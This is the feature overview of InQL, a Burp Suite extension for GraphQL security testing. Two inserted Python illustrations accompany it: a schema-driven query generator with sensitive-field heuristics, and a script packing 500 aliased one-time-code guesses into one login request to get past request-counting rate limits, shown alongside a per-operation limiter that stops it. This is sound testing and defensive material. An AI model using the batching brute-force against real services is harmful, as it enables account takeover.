https://github.com/doyensec/inql
InQL is a robust, open-source Burp Suite extension for advanced GraphQL testing, offering intuitive vulnerability detection, customizable scans, and seamless Burp integration.
🌟 Features
The InQL user interface is equipped with two primary components: the Scanner and the Attacker.
🔎 Scanner
The Scanner is the core of InQL v5.0. Point it at a GraphQL endpoint or a local introspection schema file and it generates a query or mutation for every root field the schema exposes, organizing them into a structured view for your analysis.
✅ Customizable Scans
InQL v5.0 lets you customize your scans: adjust how deeply nested fields are expanded in the generated queries, and how many spaces are used for indentation. You can also run ‘Points of Interest’ scans to flag parts of the GraphQL schema that may hide vulnerabilities.
✅ Points of Interest Analysis
After running a Points of Interest scan, the findings are grouped into categories of potential issues found in the schema. You can enable or disable each category to suit the target.
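The Scanner and Points of Interest sections above describe what a scan does with an introspection result. The following Python is an added illustration of the underlying mechanics, not InQL's own code: it walks a constructed, minimal introspection response, generates one valid document per root field with the two knobs a scan exposes (nesting depth and indentation, with every argument lifted into a typed variable so nothing has to be guessed), and flags schema elements with simple name and metadata heuristics. The sample schema, the category names and the regular expressions are this example's own assumptions, not InQL's list.

```python
import json
import re

# Constructed, minimal introspection result (the answer to a __schema query), not captured
# from any live service. A real response also lists the built-in scalars and many more types.
INTROSPECTION_JSON = r'''{"data": {"__schema": {
 "queryType": {"name": "Query"}, "mutationType": {"name": "Mutation"},
 "types": [
  {"kind": "OBJECT", "name": "Query", "fields": [
   {"name": "user", "type": {"kind": "OBJECT", "name": "User", "ofType": null}, "args": [
     {"name": "id", "type": {"kind": "NON_NULL", "name": null, "ofType": {"kind": "SCALAR", "name": "ID", "ofType": null}}}]},
   {"name": "debugInfo", "args": [], "isDeprecated": true, "deprecationReason": "internal",
    "type": {"kind": "SCALAR", "name": "JSON", "ofType": null}}]},
  {"kind": "OBJECT", "name": "Mutation", "fields": [
   {"name": "login", "type": {"kind": "SCALAR", "name": "String", "ofType": null}, "args": [
     {"name": "email", "type": {"kind": "NON_NULL", "name": null, "ofType": {"kind": "SCALAR", "name": "String", "ofType": null}}},
     {"name": "password", "type": {"kind": "NON_NULL", "name": null, "ofType": {"kind": "SCALAR", "name": "String", "ofType": null}}}]}]},
  {"kind": "OBJECT", "name": "User", "fields": [
   {"name": "id", "args": [], "type": {"kind": "SCALAR", "name": "ID", "ofType": null}},
   {"name": "email", "args": [], "type": {"kind": "SCALAR", "name": "String", "ofType": null}},
   {"name": "passwordHash", "args": [], "type": {"kind": "SCALAR", "name": "String", "ofType": null}},
   {"name": "friends", "args": [], "type": {"kind": "LIST", "name": null, "ofType": {"kind": "OBJECT", "name": "User", "ofType": null}}}]},
  {"kind": "SCALAR", "name": "JSON", "fields": null}]}}}'''

BUILTIN_SCALARS = {"Int", "Float", "String", "Boolean", "ID"}
SENSITIVE = re.compile(r"passw|secret|token|api_?key|private|ssn", re.I)  # heuristic, this example's own

def load_schema(text):
    """Parse an introspection response into (__schema dict, name -> type map)."""
    schema = json.loads(text)["data"]["__schema"]
    return schema, {t["name"]: t for t in schema["types"]}

def unwrap(t):
    """Strip NON_NULL/LIST wrappers; return (name, kind) of the innermost named type."""
    while t.get("ofType"):
        t = t["ofType"]
    return t["name"], t["kind"]

def type_ref(t):
    """Render a type reference as SDL writes it, e.g. [User]! or ID!."""
    if t["kind"] == "NON_NULL":
        return type_ref(t["ofType"]) + "!"
    return "[" + type_ref(t["ofType"]) + "]" if t["kind"] == "LIST" else t["name"]

def render_args(field_name, args, variables):
    """Lift each argument into a typed variable so the document is valid without guessing values."""
    parts = []
    for a in args:
        var = f"{field_name}_{a['name']}"
        variables.setdefault(var, type_ref(a["type"]))
        parts.append(f"{a['name']}: ${var}")
    return "(" + ", ".join(parts) + ")" if parts else ""

def render_selection(types, type_name, level, max_level, indent, variables):
    """Select every field; nested objects recurse until max_level, which terminates cycles (User.friends)."""
    pad, lines = " " * (indent * level), []
    for f in types[type_name].get("fields") or []:
        inner, kind = unwrap(f["type"])
        args = render_args(f["name"], f["args"], variables)
        if kind not in ("OBJECT", "INTERFACE"):
            lines.append(f"{pad}{f['name']}{args}")
        elif level < max_level:
            body = render_selection(types, inner, level + 1, max_level, indent, variables)
            body = body or pad + " " * indent + "__typename"  # never emit an empty selection set
            lines.append(f"{pad}{f['name']}{args} {{\n{body}\n{pad}}}")
    return "\n".join(lines)

def generate_operation(schema, types, kind, field_name, depth=2, indent=2):
    """One complete document for a root field; depth = object levels expanded below it, indent = spaces per level."""
    root = types[schema[kind + "Type"]["name"]]
    field = next(f for f in root["fields"] if f["name"] == field_name)
    variables, pad, selection = {}, " " * indent, ""
    args = render_args(field_name, field["args"], variables)
    inner, inner_kind = unwrap(field["type"])
    if inner_kind in ("OBJECT", "INTERFACE"):
        body = render_selection(types, inner, 2, depth + 1, indent, variables)
        selection = " {\n" + (body or pad * 2 + "__typename") + "\n" + pad + "}"
    head = f"{kind} {field_name}"
    if variables:
        head += "(" + ", ".join(f"${n}: {t}" for n, t in variables.items()) + ")"
    return f"{head} {{\n{pad}{field_name}{args}{selection}\n}}"

def points_of_interest(schema, types, enabled=None):
    """Flag schema elements worth a manual look; `enabled` restricts categories like toggling them in a scan."""
    hits = []
    for t in schema["types"]:
        if t["kind"] == "SCALAR" and t["name"] not in BUILTIN_SCALARS:
            hits.append(("custom_scalar", t["name"], "loosely typed input, worth fuzzing"))
        for f in t.get("fields") or []:
            loc = f"{t['name']}.{f['name']}"
            if f.get("isDeprecated"):
                hits.append(("deprecated", loc, f.get("deprecationReason") or "still served"))
            if SENSITIVE.search(f["name"]):
                hits.append(("sensitive_field", loc, "name suggests secret material"))
            hits += [("sensitive_arg", f"{loc}({a['name']})", "takes a credential")
                     for a in f["args"] if SENSITIVE.search(a["name"])]
    return hits if enabled is None else [h for h in hits if h[0] in enabled]
```

`generate_operation(schema, types, "query", "user", depth=2)` yields `query user($user_id: ID!) { user(id: $user_id) { id email passwordHash friends { id email passwordHash } } }` laid out one field per line; with `depth=1` the recursive `friends` selection is dropped. The depth cut-off matters on real schemas, where self-referencing types would otherwise expand without bound.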
✅ Enhanced Interactions with Burp
InQL v5.0 seamlessly integrates with Burp, enabling you to generate queries directly from any GraphQL request in Burp. You can also send auto-generated queries to other Burp tools for further analysis.
✅ Custom Headers
You can set custom headers (such as session or authorization headers) per domain; the domain list is auto-populated from observed traffic.
⚔️ Attacker
The Attacker component runs batch GraphQL attacks: many operations are packed into a single HTTP request, which gets past rate limits that count requests rather than the operations inside them.
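Why batching gets past a request-counting rate limit, as an added example that is not part of InQL: the Python below builds one mutation carrying 500 aliased login attempts (each alias is a separate root field, so one POST carries all of them), then contrasts a limiter that charges per HTTP request with one that charges per root field in the document. The `login`/`otp` field names, the target schema and both limiter classes are this example's own assumptions.

```python
import json
import re

NAME = re.compile(r"[_A-Za-z][_0-9A-Za-z]*")

def build_alias_batch(field, fixed_args, vary_arg, candidates, selection=""):
    """Pack one attempt per alias into a single mutation. Aliases must be unique within a
    selection set, so each is derived from the candidate's index."""
    lines = []
    for i, cand in enumerate(candidates):
        args = {**fixed_args, vary_arg: cand}
        # JSON literals for strings, ints, bools and null are also valid GraphQL literals
        rendered = ", ".join(f"{k}: {json.dumps(v)}" for k, v in args.items())
        sel = f" {{ {selection} }}" if selection else ""
        lines.append(f"  attempt_{i}: {field}({rendered}){sel}")
    return "mutation {\n" + "\n".join(lines) + "\n}"

def to_request_body(query):
    """Wrap a document the way a GraphQL client posts it: one HTTP request, one JSON body."""
    return json.dumps({"query": query})

def count_root_fields(query):
    """Count top-level fields (aliases included) of the single operation in `query` with a
    brace-depth scan; string literals are skipped so a '{' inside one is not miscounted."""
    depth = paren = count = i = 0
    prev = ""  # last significant (non-whitespace) character seen
    while i < len(query):
        ch = query[i]
        if ch == '"':
            j = i + 1
            while j < len(query) and query[j] != '"':
                j += 2 if query[j] == "\\" else 1
            i, prev = j + 1, '"'
            continue
        if ch.isspace():
            i += 1
            continue
        m = NAME.match(query, i)
        if m:
            # a name at depth 1 outside parentheses is a root field, unless it follows
            # ':' (the real field behind an alias) or '@' (a directive name)
            if depth == 1 and paren == 0 and prev not in (":", "@"):
                count += 1
            i, prev = m.end(), m.group()[-1]
            continue
        depth += {"{": 1, "}": -1}.get(ch, 0)
        paren += {"(": 1, ")": -1}.get(ch, 0)
        prev = ch
        i += 1
    return count

class RequestCountingLimiter:
    """The weak pattern: one unit per HTTP request, so a batch of N aliases costs 1."""
    def __init__(self, limit):
        self.limit, self.spent = limit, {}

    def allow(self, client, body):
        self.spent[client] = self.spent.get(client, 0) + 1
        return self.spent[client] <= self.limit

class OperationCountingLimiter(RequestCountingLimiter):
    """The fix: charge one unit per root field, so N aliased attempts cost N."""
    def allow(self, client, body):
        cost = count_root_fields(json.loads(body)["query"])
        self.spent[client] = self.spent.get(client, 0) + cost
        return self.spent[client] <= self.limit

if __name__ == "__main__":
    # Constructed target: a login mutation that takes a 4-digit one-time code.
    guesses = [f"{n:04d}" for n in range(500)]
    doc = build_alias_batch("login", {"email": "victim@example.com"}, "otp", guesses, "token")
    body = to_request_body(doc)
    print(doc.splitlines()[1])
    print("root fields in one request:", count_root_fields(doc))
    print("request-counting limiter (5/window) allows it:", RequestCountingLimiter(5).allow("10.0.0.1", body))
    print("operation-counting limiter (5/window) allows it:", OperationCountingLimiter(5).allow("10.0.0.1", body))
```

A server that meters only at the HTTP layer sees one request here; metering per root field (or per resolver invocation) is what makes the 500 attempts cost 500. The same alias trick also works for `query` documents, for example enumerating object IDs.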
📝 Burp’s Native Message Editors
Burp’s native message editors now come with an additional ‘GraphQL’ tab, providing an efficient way to view and modify GraphQL requests.
⬇️ Installation
To successfully install InQL v5.0, ensure you meet the following requirements:
Burp:
- Support is only provided for the most recent version of Burp.
- Compatible with both “Professional” and “Community” editions.
Java:
- The Montoya API needs Java 17 or later.